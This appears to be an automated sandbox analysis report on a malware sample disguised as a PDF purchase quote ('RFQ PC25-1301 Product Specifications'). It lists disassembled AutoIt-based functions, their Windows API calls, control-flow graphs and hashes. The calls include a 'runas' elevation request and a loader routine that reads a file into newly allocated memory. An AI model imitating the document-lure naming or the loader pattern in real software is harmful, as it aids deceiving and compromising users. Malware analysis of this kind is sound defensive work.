                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: 830c0cbde2f7925646f8e37f94265ad45ebe0d72ef3606c5333e987ac8e0f88a
                                                                                                                • Instruction ID: 9060dd2f228bca32ac575d7d670a5e5065645e9ffc943412083b4fd203bbf3ee
                                                                                                                • Opcode Fuzzy Hash: 830c0cbde2f7925646f8e37f94265ad45ebe0d72ef3606c5333e987ac8e0f88a
                                                                                                                • Instruction Fuzzy Hash: 63117CB5201B01BFDB219BA5DC48FA77BB9EBC9B61F10416EB40396290DBB1D801C620
                                                                                                                Function 00A82BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A42B6B
                                                                                                                  • Part of subcall function 00A43A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B11418,?,00A42E7F,?,?,?,00000000), ref: 00A43A78
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00B02224), ref: 00A82C10
                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?,00B02224), ref: 00A82C17
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                • String ID: runas
                                                                                                                • API String ID: 448630720-4000483414
                                                                                                                • Opcode ID: 1bb174f57452c76581c9d70666e85efde8483fc9938d65a16b16bb472b336ad3
                                                                                                                • Instruction ID: 996bfa19a267b18a4de1f7738688899af25703da60e6939a5b60241a69e8df5e
                                                                                                                • Opcode Fuzzy Hash: 1bb174f57452c76581c9d70666e85efde8483fc9938d65a16b16bb472b336ad3
                                                                                                                • Instruction Fuzzy Hash: F011D63A208341AACB14FF64D955ABEBBA49FD1750F84182DF142570A2CF319A4AD712
                                                                                                                Function 00A4D730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetInputState.USER32 ref: 00A4D807
                                                                                                                • timeGetTime.WINMM ref: 00A4DA07
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A4DB28
                                                                                                                • TranslateMessage.USER32(?), ref: 00A4DB7B
                                                                                                                • DispatchMessageW.USER32(?), ref: 00A4DB89
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A4DB9F
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A4DBB1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2189390790-0
                                                                                                                • Opcode ID: ace924d9b7595ff7b4bf162b998ff92f7d89c39be057475c4e209d16c0d6f69a
                                                                                                                • Instruction ID: 27f88c005ed01cfc32326089b5118814b98b821e6136bca0cfe67fdf6365f71c
                                                                                                                • Opcode Fuzzy Hash: ace924d9b7595ff7b4bf162b998ff92f7d89c39be057475c4e209d16c0d6f69a
                                                                                                                • Instruction Fuzzy Hash: 0042B134708242EFDB28CF24C885BAAB7F1FF85314F54895EE46687292D771E845CB92
                                                                                                                Function 00A42CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A42D07
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00A42D31
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A42D42
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00A42D5F
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A42D6F
                                                                                                                • LoadIconW.USER32(000000A9), ref: 00A42D85
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A42D94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 69d5a90656019cb7b59907d4ab63d6782fff8a0024ef00392f22ddaa5041a77c
                                                                                                                • Instruction ID: a27b5b544216eada352fc2535d736a2541f3db12a4300579ce8be25a1e49bdd4
                                                                                                                • Opcode Fuzzy Hash: 69d5a90656019cb7b59907d4ab63d6782fff8a0024ef00392f22ddaa5041a77c
                                                                                                                • Instruction Fuzzy Hash: 3B21E7B1902209AFDB00DFD8EC49BDDBBB8FB08750F40851AE622A72A0DBB10545CF50
                                                                                                                Function 00A8065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 302 a8065b-a8068b call a8042f 305 a8068d-a80698 call a6f2c6 302->305 306 a806a6-a806b2 call a75221 302->306 311 a8069a-a806a1 call a6f2d9 305->311 312 a806cb-a80714 call a8039a 306->312 313 a806b4-a806c9 call a6f2c6 call a6f2d9 306->313 322 a8097d-a80983 311->322 320 a80781-a8078a GetFileType 312->320 321 a80716-a8071f 312->321 313->311 327 a8078c-a807bd GetLastError call a6f2a3 CloseHandle 320->327 328 a807d3-a807d6 320->328 325 a80721-a80725 321->325 326 a80756-a8077c GetLastError call a6f2a3 321->326 325->326 331 a80727-a80754 call a8039a 325->331 326->311 327->311 339 a807c3-a807ce call a6f2d9 327->339 329 a807d8-a807dd 328->329 330 a807df-a807e5 328->330 334 a807e9-a80837 call a7516a 329->334 330->334 335 a807e7 330->335 331->320 331->326 345 a80839-a80845 call a805ab 334->345 346 a80847-a8086b call a8014d 334->346 335->334 339->311 345->346 353 a8086f-a80879 call a786ae 345->353 351 a8086d 346->351 352 a8087e-a808c1 346->352 351->353 355 a808e2-a808f0 352->355 356 a808c3-a808c7 352->356 353->322 359 a8097b 355->359 360 a808f6-a808fa 355->360 356->355 358 a808c9-a808dd 356->358 358->355 359->322 360->359 361 a808fc-a8092f CloseHandle call a8039a 360->361 364 a80931-a8095d GetLastError call a6f2a3 call a75333 361->364 365 a80963-a80977 361->365 364->365 365->359
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A8039A: CreateFileW.KERNELBASE(00000000,00000000,?,00A80704,?,?,00000000,?,00A80704,00000000,0000000C), ref: 00A803B7
                                                                                                                • GetLastError.KERNEL32 ref: 00A8076F
                                                                                                                • __dosmaperr.LIBCMT ref: 00A80776
                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 00A80782
                                                                                                                • GetLastError.KERNEL32 ref: 00A8078C
                                                                                                                • __dosmaperr.LIBCMT ref: 00A80795
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A807B5
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A808FF
                                                                                                                • GetLastError.KERNEL32 ref: 00A80931
                                                                                                                • __dosmaperr.LIBCMT ref: 00A80938
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                • String ID: H
                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                • Opcode ID: d8fd784cd25f6f08cdbe6aebca79702cdacf51c77d5666bcd5b48b00b6e80937
                                                                                                                • Instruction ID: 00491a5fc3ddc5565bf779b616d6f974b6d6df3a71f5cfee39e625c5309794cc
                                                                                                                • Opcode Fuzzy Hash: d8fd784cd25f6f08cdbe6aebca79702cdacf51c77d5666bcd5b48b00b6e80937
                                                                                                                • Instruction Fuzzy Hash: 7CA11332A101088FDF19FF78D852BAE7BB0EB06320F14416AF8159F291DB759957CB91
                                                                                                                Function 00A4344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B11418,?,00A42E7F,?,?,?,00000000), ref: 00A43A78
                                                                                                                  • Part of subcall function 00A43357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A43379
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A4356A
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A8318D
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A831CE
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A83210
                                                                                                                • _wcslen.LIBCMT ref: 00A83277
                                                                                                                • _wcslen.LIBCMT ref: 00A83286
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                • API String ID: 98802146-2727554177
                                                                                                                • Opcode ID: 4879c80fb50ad10e24a494e06cb0ee45b1beac38238d6367d907b35d1916bec1
                                                                                                                • Instruction ID: a64022756456428ffd6607e1c9cd0ec2a6337df562ffde71953c98bec43084f5
                                                                                                                • Opcode Fuzzy Hash: 4879c80fb50ad10e24a494e06cb0ee45b1beac38238d6367d907b35d1916bec1
                                                                                                                • Instruction Fuzzy Hash: 5A71C1724043019EC704EF69ED829ABBBE8FF98750F80492EF455C3261EB309A58CB56
                                                                                                                Function 00A42B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A42B8E
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00A42B9D
                                                                                                                • LoadIconW.USER32(00000063), ref: 00A42BB3
                                                                                                                • LoadIconW.USER32(000000A4), ref: 00A42BC5
                                                                                                                • LoadIconW.USER32(000000A2), ref: 00A42BD7
                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A42BEF
                                                                                                                • RegisterClassExW.USER32(?), ref: 00A42C40
                                                                                                                  • Part of subcall function 00A42CD4: GetSysColorBrush.USER32(0000000F), ref: 00A42D07
                                                                                                                  • Part of subcall function 00A42CD4: RegisterClassExW.USER32(00000030), ref: 00A42D31
                                                                                                                  • Part of subcall function 00A42CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A42D42
                                                                                                                  • Part of subcall function 00A42CD4: InitCommonControlsEx.COMCTL32(?), ref: 00A42D5F
                                                                                                                  • Part of subcall function 00A42CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A42D6F
                                                                                                                  • Part of subcall function 00A42CD4: LoadIconW.USER32(000000A9), ref: 00A42D85
                                                                                                                  • Part of subcall function 00A42CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A42D94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: c9c08f2953fe98fd752b896d7737495627c0ae2b31e9a42328b696cbc52a44bb
                                                                                                                • Instruction ID: f2c4ccd3792ae12b85aeb079a44e721df0b0cdb6181109f544d82adcdee17bcf
                                                                                                                • Opcode Fuzzy Hash: c9c08f2953fe98fd752b896d7737495627c0ae2b31e9a42328b696cbc52a44bb
                                                                                                                • Instruction Fuzzy Hash: D0212874A02314ABDB10DFA9FC55AD9BFB4FB48B50F80842AE611A76A4DBB10540CF98
                                                                                                                Function 00A43170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 443 a43170-a43185 444 a431e5-a431e7 443->444 445 a43187-a4318a 443->445 444->445 448 a431e9 444->448 446 a4318c-a43193 445->446 447 a431eb 445->447 449 a43265-a4326d PostQuitMessage 446->449 450 a43199-a4319e 446->450 452 a82dfb-a82e23 call a418e2 call a5e499 447->452 453 a431f1-a431f6 447->453 451 a431d0-a431d8 DefWindowProcW 448->451 458 a43219-a4321b 449->458 455 a431a4-a431a8 450->455 456 a82e7c-a82e90 call aabf30 450->456 457 a431de-a431e4 451->457 488 a82e28-a82e2f 452->488 459 a4321d-a43244 SetTimer RegisterWindowMessageW 453->459 460 a431f8-a431fb 453->460 462 a82e68-a82e77 call aac161 455->462 463 a431ae-a431b3 455->463 456->458 481 a82e96 456->481 458->457 459->458 464 a43246-a43251 CreatePopupMenu 459->464 466 a82d9c-a82d9f 460->466 467 a43201-a43214 KillTimer call a430f2 call a43c50 460->467 462->458 471 a82e4d-a82e54 463->471 472 a431b9-a431be 463->472 464->458 474 a82da1-a82da5 466->474 475 a82dd7-a82df6 MoveWindow 466->475 467->458 471->451 484 a82e5a-a82e63 call aa0ad7 471->484 479 a431c4-a431ca 472->479 480 a43253-a43263 call a4326f 472->480 482 a82dc6-a82dd2 SetFocus 474->482 483 a82da7-a82daa 474->483 475->458 479->451 479->488 480->458 481->451 482->458 483->479 489 a82db0-a82dc1 call a418e2 483->489 484->451 488->451 492 a82e35-a82e48 call a430f2 call a43837 488->492 489->458 492->451
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A4316A,?,?), ref: 00A431D8
                                                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,00A4316A,?,?), ref: 00A43204
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A43227
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A4316A,?,?), ref: 00A43232
                                                                                                                • CreatePopupMenu.USER32 ref: 00A43246
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00A43267
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                • Opcode ID: 691ef24a1f328504f23b8cfa8ce62cd975da7c365ec7cfef8c89fd62d8fb86f3
                                                                                                                • Instruction ID: 13d9e0c402d923ed15f5d99b829d51cda84dec42b1dcfba8abc03eb5e15322ed
                                                                                                                • Opcode Fuzzy Hash: 691ef24a1f328504f23b8cfa8ce62cd975da7c365ec7cfef8c89fd62d8fb86f3
                                                                                                                • Instruction Fuzzy Hash: C641783B200204BBDF146B7CAD09BF93B69EB91350F844626FB12872A5DBB09B41C765
                                                                                                                Function 0141E2E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 499 141e2e0-141e38e call 141bce0 502 141e395-141e3bb call 141f1f0 CreateFileW 499->502 505 141e3c2-141e3d2 502->505 506 141e3bd 502->506 513 141e3d4 505->513 514 141e3d9-141e3f3 VirtualAlloc 505->514 507 141e50d-141e511 506->507 509 141e553-141e556 507->509 510 141e513-141e517 507->510 515 141e559-141e560 509->515 511 141e523-141e527 510->511 512 141e519-141e51c 510->512 516 141e537-141e53b 511->516 517 141e529-141e533 511->517 512->511 513->507 518 141e3f5 514->518 519 141e3fa-141e411 ReadFile 514->519 520 141e562-141e56d 515->520 521 141e5b5-141e5ca 515->521 524 141e54b 516->524 525 141e53d-141e547 516->525 517->516 518->507 526 141e413 519->526 527 141e418-141e458 VirtualAlloc 519->527 528 141e571-141e57d 520->528 529 141e56f 520->529 522 141e5da-141e5e2 521->522 523 141e5cc-141e5d7 VirtualFree 521->523 523->522 524->509 525->524 526->507 530 141e45a 527->530 531 141e45f-141e47a call 141f440 527->531 532 141e591-141e59d 528->532 533 141e57f-141e58f 528->533 529->521 530->507 539 141e485-141e48f 531->539 535 141e5aa-141e5b0 532->535 536 141e59f-141e5a8 532->536 534 141e5b3 533->534 534->515 535->534 536->534 540 141e491-141e4c0 call 141f440 539->540 541 141e4c2-141e4d6 call 141f250 539->541 540->539 547 141e4d8 541->547 548 141e4da-141e4de 541->548 547->507 549 141e4e0-141e4e4 CloseHandle 548->549 550 141e4ea-141e4ee 548->550 549->550 551 141e4f0-141e4fb VirtualFree 550->551 552 141e4fe-141e507 550->552 551->552 552->502 552->507
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0141E3B1
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0141E5D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 204039940-0
                                                                                                                • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                • Instruction ID: b5160a52f5b2d118192514b450567c0c90ea2430d89710878960593e4877039f
                                                                                                                • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                • Instruction Fuzzy Hash: B1A13974E00209EBDB15CFE4C894BEEBBB5BF48304F20815AE605BB295E7759A41CF94
                                                                                                                Function 00A42C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 563 a42c63-a42cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A42C91
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A42CB2
                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A41CAD,?), ref: 00A42CC6
                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A41CAD,?), ref: 00A42CCF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: c9dc948883d48c1392910afa35b43cfcd7817105bd4ef61bea6a46fe5acd8ab5
                                                                                                                • Instruction ID: 3533678a588dedeeeabdc128564e033c37b917a4b037d7f9865646659a89c2bf
                                                                                                                • Opcode Fuzzy Hash: c9dc948883d48c1392910afa35b43cfcd7817105bd4ef61bea6a46fe5acd8ab5
                                                                                                                • Instruction Fuzzy Hash: DAF03A755402907AEB30071BBC08EB77EBDE7C7F60B90851AFA10A36A4DA610841DAB8
                                                                                                                Function 0141E090 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 678 141e090-141e1d4 call 141bce0 call 141df80 CreateFileW 685 141e1d6 678->685 686 141e1db-141e1eb 678->686 687 141e28b-141e290 685->687 689 141e1f2-141e20c VirtualAlloc 686->689 690 141e1ed 686->690 691 141e210-141e227 ReadFile 689->691 692 141e20e 689->692 690->687 693 141e229 691->693 694 141e22b-141e265 call 141dfc0 call 141cf80 691->694 692->687 693->687 699 141e281-141e289 ExitProcess 694->699 700 141e267-141e27c call 141e010 694->700 699->687 700->699
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0141DF80: Sleep.KERNELBASE(000001F4), ref: 0141DF91
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0141E1CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: DV8B53ZSDO1G5ERI6AUF
